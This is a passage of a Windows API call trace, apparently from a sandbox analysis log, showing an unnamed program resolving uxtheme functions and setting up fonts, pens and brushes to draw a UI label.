GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeColor") returned 0x74b1616c [0281.619] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeMetric", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0281.619] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeMetric", cchWideChar=14, lpMultiByteStr=0x634a1dc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeMetric", lpUsedDefaultChar=0x0) returned 14 [0281.619] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeMetric") returned 0x74b206e2 [0281.619] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeString", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0281.619] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeString", cchWideChar=14, lpMultiByteStr=0x634a1dc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeString", lpUsedDefaultChar=0x0) returned 14 [0281.620] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeString") returned 0x74b422e4 [0281.620] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBool", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0281.620] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBool", cchWideChar=12, lpMultiByteStr=0x634a1dc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeBool", lpUsedDefaultChar=0x0) returned 12 [0281.620] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeBool") returned 0x74b17c1f [0281.620] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeInt", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0281.620] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeInt", cchWideChar=11, lpMultiByteStr=0x634a1dc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeInt", lpUsedDefaultChar=0x0) returned 11 [0281.621] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeInt") returned 0x74b1616c [0281.621] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeEnumValue", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0281.621] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeEnumValue", cchWideChar=17, lpMultiByteStr=0x635ff9c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeEnumValue", lpUsedDefaultChar=0x0) returned 17 [0281.621] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeEnumValue") returned 0x74b1616c [0281.621] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePosition", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0281.621] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePosition", cchWideChar=16, lpMultiByteStr=0x635ff9c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemePosition", lpUsedDefaultChar=0x0) returned 16 [0281.622] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemePosition") returned 0x74b42350 [0281.622] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeFont", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0281.622] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeFont", cchWideChar=12, lpMultiByteStr=0x634a1dc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeFont", lpUsedDefaultChar=0x0) returned 12 [0281.622] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeFont") returned 0x74b1ff21 [0281.622] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeRect", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0281.622] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeRect", cchWideChar=12, lpMultiByteStr=0x634a1dc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeRect", lpUsedDefaultChar=0x0) returned 12 [0281.622] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeRect") returned 0x74b23611 [0281.623] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeMargins", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0281.623] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeMargins", cchWideChar=15, lpMultiByteStr=0x634a1dc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeMargins", lpUsedDefaultChar=0x0) returned 15 [0281.623] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeMargins") returned 0x74b186e9 [0281.623] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeIntList", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0281.623] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeIntList", cchWideChar=15, lpMultiByteStr=0x634a1dc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeIntList", lpUsedDefaultChar=0x0) returned 15 [0281.623] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeIntList") returned 0x74b423b1 [0281.623] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePropertyOrigin", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0281.623] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePropertyOrigin", cchWideChar=22, lpMultiByteStr=0x635ff9c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemePropertyOrigin", lpUsedDefaultChar=0x0) returned 22 [0281.624] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemePropertyOrigin") returned 0x74b33fbb [0281.624] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetWindowTheme", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0281.624] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetWindowTheme", cchWideChar=14, lpMultiByteStr=0x634a1dc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetWindowTheme", lpUsedDefaultChar=0x0) returned 14 [0281.624] GetProcAddress (hModule=0x74b10000, lpProcName="SetWindowTheme") returned 0x74b20134 [0281.624] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeFilename", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0281.624] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeFilename", cchWideChar=16, lpMultiByteStr=0x635ff9c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeFilename", lpUsedDefaultChar=0x0) returned 16 [0281.625] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeFilename") returned 0x74b42412 [0281.625] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysColor", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0281.625] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysColor", cchWideChar=16, lpMultiByteStr=0x635ff9c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysColor", lpUsedDefaultChar=0x0) returned 16 [0281.625] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeSysColor") returned 0x74b33274 [0281.625] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysColorBrush", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0281.625] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysColorBrush", cchWideChar=21, lpMultiByteStr=0x635ff9c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysColorBrush", lpUsedDefaultChar=0x0) returned 21 [0281.626] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeSysColorBrush") returned 0x74b4301e [0281.626] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysBool", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0281.626] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysBool", cchWideChar=15, lpMultiByteStr=0x634a1dc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysBool", lpUsedDefaultChar=0x0) returned 15 [0281.626] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeSysBool") returned 0x74b43172 [0281.626] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysSize", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0281.626] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysSize", cchWideChar=15, lpMultiByteStr=0x634a1dc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysSize", lpUsedDefaultChar=0x0) returned 15 [0281.627] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeSysSize") returned 0x74b4320b [0281.627] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysFont", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0281.627] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysFont", cchWideChar=15, lpMultiByteStr=0x634a1dc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysFont", lpUsedDefaultChar=0x0) returned 15 [0281.627] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeSysFont") returned 0x74b429c4 [0281.627] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysString", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0281.627] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysString", cchWideChar=17, lpMultiByteStr=0x635ff9c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysString", lpUsedDefaultChar=0x0) returned 17 [0281.627] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeSysString") returned 0x74b42b3f [0281.628] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysInt", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0281.628] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysInt", cchWideChar=14, lpMultiByteStr=0x634a1dc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysInt", lpUsedDefaultChar=0x0) returned 14 [0281.628] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeSysInt") returned 0x74b42bd3 [0281.628] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeActive", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0281.628] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeActive", cchWideChar=13, lpMultiByteStr=0x634a1dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsThemeActive", lpUsedDefaultChar=0x0) returned 13 [0281.628] GetProcAddress (hModule=0x74b10000, lpProcName="IsThemeActive") returned 0x74b1f785 [0281.628] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsAppThemed", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0281.628] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsAppThemed", cchWideChar=11, lpMultiByteStr=0x634a1dc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsAppThemed", lpUsedDefaultChar=0x0) returned 11 [0281.629] GetProcAddress (hModule=0x74b10000, lpProcName="IsAppThemed") returned 0x74b1f869 [0281.629] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetWindowTheme", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0281.629] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetWindowTheme", cchWideChar=14, lpMultiByteStr=0x634a1dc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetWindowTheme", lpUsedDefaultChar=0x0) returned 14 [0281.629] GetProcAddress (hModule=0x74b10000, lpProcName="GetWindowTheme") returned 0x74b1df46 [0281.629] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnableThemeDialogTexture", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0281.629] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnableThemeDialogTexture", cchWideChar=24, lpMultiByteStr=0x6366c6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EnableThemeDialogTexture", lpUsedDefaultChar=0x0) returned 24 [0281.630] GetProcAddress (hModule=0x74b10000, lpProcName="EnableThemeDialogTexture") returned 0x74b1fcaf [0281.630] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeDialogTextureEnabled", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0281.630] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeDialogTextureEnabled", cchWideChar=27, lpMultiByteStr=0x6366c6c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsThemeDialogTextureEnabled", lpUsedDefaultChar=0x0) returned 27 [0281.630] GetProcAddress (hModule=0x74b10000, lpProcName="IsThemeDialogTextureEnabled") returned 0x74b4312b [0281.630] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeAppProperties", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0281.630] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeAppProperties", cchWideChar=21, lpMultiByteStr=0x635ff9c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeAppProperties", lpUsedDefaultChar=0x0) returned 21 [0281.631] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeAppProperties") returned 0x74b20fb1 [0281.631] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetThemeAppProperties", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0281.631] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetThemeAppProperties", cchWideChar=21, lpMultiByteStr=0x635ff9c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetThemeAppProperties", lpUsedDefaultChar=0x0) returned 21 [0281.631] GetProcAddress (hModule=0x74b10000, lpProcName="SetThemeAppProperties") returned 0x74b43296 [0281.631] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetCurrentThemeName", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0281.631] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetCurrentThemeName", cchWideChar=19, lpMultiByteStr=0x635ff9c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentThemeName", lpUsedDefaultChar=0x0) returned 19 [0281.632] GetProcAddress (hModule=0x74b10000, lpProcName="GetCurrentThemeName") returned 0x74b205dd [0281.632] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeDocumentationProperty", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0281.632] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeDocumentationProperty", cchWideChar=29, lpMultiByteStr=0x6366c6c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeDocumentationProperty", lpUsedDefaultChar=0x0) returned 29 [0281.632] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeDocumentationProperty") returned 0x74b42932 [0281.632] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeParentBackground", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0281.632] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeParentBackground", cchWideChar=25, lpMultiByteStr=0x6366c6c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DrawThemeParentBackground", lpUsedDefaultChar=0x0) returned 25 [0281.633] GetProcAddress (hModule=0x74b10000, lpProcName="DrawThemeParentBackground") returned 0x74b153e5 [0281.633] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnableTheming", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0281.633] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnableTheming", cchWideChar=13, lpMultiByteStr=0x634a1dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EnableTheming", lpUsedDefaultChar=0x0) returned 13 [0281.633] GetProcAddress (hModule=0x74b10000, lpProcName="EnableTheming") returned 0x74b42feb [0281.633] GetFileVersionInfoSizeW (in: lptstrFilename="comctl32.dll", lpdwHandle=0x534f674 | out: lpdwHandle=0x534f674) returned 0x73c [0281.633] GetFileVersionInfoW (in: lptstrFilename="comctl32.dll", dwHandle=0x0, dwLen=0x73c, lpData=0x62cb1d0 | out: lpData=0x62cb1d0) returned 1 [0281.633] VerQueryValueW (in: pBlock=0x62cb1d0, lpSubBlock="\\", lplpBuffer=0x534f66c, puLen=0x534f668 | out: lplpBuffer=0x534f66c*=0x62cb1f8, puLen=0x534f668) returned 1 [0281.633] IsAppThemed () returned 0x1 [0281.633] IsThemeActive () returned 0x1 [0281.634] GetDC (hWnd=0x0) returned 0xc01016e [0281.634] MoveToEx (in: hdc=0xc01016e, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0281.634] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x633b7b4, cbMultiByte=6, lpWideCharStr=0x534e230, cchWideChar=2047 | out: lpWideCharStr="Tahoma") returned 6 [0281.634] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x633b7b4, cbMultiByte=6, lpWideCharStr=0x634a21c, cchWideChar=7 | out: lpWideCharStr="Tahoma") returned 6 [0281.634] CreateFontIndirectW (lplf=0x534f268) returned 0xb0a0227 [0281.634] SelectObject (hdc=0xc01016e, h=0xb0a0227) returned 0x18a002e [0281.634] GetSysColor (nIndex=8) returned 0x0 [0281.634] SetTextColor (hdc=0xc01016e, color=0x0) returned 0x0 [0281.636] CreatePenIndirect (plpen=0x534f2c4) returned 0x830021e [0281.636] SelectObject (hdc=0xc01016e, h=0x830021e) returned 0x1b00017 [0281.636] SetROP2 (hdc=0xc01016e, rop2=13) returned 13 [0281.636] CreateBrushIndirect (plbrush=0x534f2c4) returned 0xc100741 [0281.636] UnrealizeObject (h=0xc100741) returned 1 [0281.636] SelectObject (hdc=0xc01016e, h=0xc100741) returned 0x1900010 [0281.636] SetBkColor (hdc=0xc01016e, color=0xffffff) returned 0xffffff [0281.636] SetBkMode (hdc=0xc01016e, mode=2) returned 2 [0281.636] GetSysColor (nIndex=8) returned 0x0 [0281.636] GetSysColor (nIndex=14) returned 0xffffff [0281.636] OpenThemeData () returned 0x10016 [0281.637] GetProcAddress (hModule=0x74b10000, lpProcName="DrawThemeTextEx") returned 0x74b163e6 [0281.637] DrawThemeTextEx () returned 0x0 [0281.657] SelectObject (hdc=0xc01016e, h=0x1b00017) returned 0x830021e [0281.657] SelectObject (hdc=0xc01016e, h=0x1900015) returned 0xc100741 [0281.657] SelectObject (hdc=0xc01016e, h=0x18a002e) returned 0xb0a0227 [0281.657] GetCurrentPositionEx (in: hdc=0xc01016e, lppt=0x534f338 | out: lppt=0x534f338) returned 1 [0281.657] ReleaseDC (hWnd=0x0, hDC=0xc01016e) returned 1 [0281.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f56d, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="õ4\x05", lpUsedDefaultChar=0x0) returned 0 [0281.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Label1", cchWideChar=6, lpMultiByteStr=0x534f56d, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Label1", lpUsedDefaultChar=0x0) returned 6 [0281.657] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358528, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.657] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358528, cbMultiByte=4, lpWideCharStr=0x63515f0, cchWideChar=4 | out: lpWideCharStr="Left") returned 4 [0281.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a23c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Left", lpUsedDefaultChar=0x0) returned 4 [0281.657] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358528, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.658] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358528, cbMultiByte=3, lpWideCharStr=0x63515f0, cchWideChar=3 | out: lpWideCharStr="Topt") returned 3 [0281.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a1fc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.658] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351608, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0281.658] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351608, cbMultiByte=5, lpWideCharStr=0x6351620, cchWideChar=5 | out: lpWideCharStr="Width") returned 5 [0281.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Width", cchWideChar=5, lpMultiByteStr=0x634a23c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Width", lpUsedDefaultChar=0x0) returned 5 [0281.658] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515f0, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.658] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515f0, cbMultiByte=6, lpWideCharStr=0x6351608, cchWideChar=6 | out: lpWideCharStr="Height\x01") returned 6 [0281.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Height", cchWideChar=6, lpMultiByteStr=0x635ffc4, 